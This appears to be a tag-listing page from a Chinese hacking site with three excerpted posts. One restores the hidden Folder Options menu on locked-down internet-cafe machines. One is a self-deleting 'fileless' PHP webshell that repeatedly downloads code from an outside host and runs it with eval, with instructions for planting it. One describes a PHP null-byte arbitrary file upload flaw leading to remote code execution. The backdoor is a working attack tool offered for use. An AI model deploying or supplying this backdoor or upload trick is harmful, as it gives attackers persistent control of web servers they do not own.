首页 标签文件

找回系统文件夹选项 文件扩展名办法

黑阔们往往去网吧的时候无法找到文件扩展名选项很伤脑筋 下面的两种办法足矣对付!   找回系统文件夹选项: 方法一:组策略 点击“开始→运行”,在运行对话框中输入“gpedit.msc”命令,点击“确定”按钮后,弹出“组策略”编辑对话框,依次展开“本地计算机策略→用户配置→管理模板→Windows组件→Windows资源管理器”,然后在右侧窗口中找到“从‘工具’菜单删除‘文件夹选项’菜单”选项,鼠标双击打开该选项,在属性对话框中切换到“设置”标签页,你会发现该属性选项已选中了“已启用”单选项,所以屏蔽了“文件夹选项”。这时你只要把该选项设置...

PHP无文件后门

  webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?> eval.txt file_put_contents('1.txt','hello world '.time()); 使用方式 将 webshel.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。 停止执行 删除或清空 webshel.txt。 缺点 服务器或WEB容器一重启后门就没了。

PHP任意文件上传漏洞

漏洞细节: 这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。 例子: move_uploaded_file ( string $filename , string $destination ) 这里的问题是,可以在文件名中插入空字符(之前多次修复过这个漏洞,比如CVE-2006-7243),利用插入空字符的方式,攻击者可以上传任意文件,引起远程代码执行漏洞等。 我这里用DVWA来演示这个例子,DVWA级别最...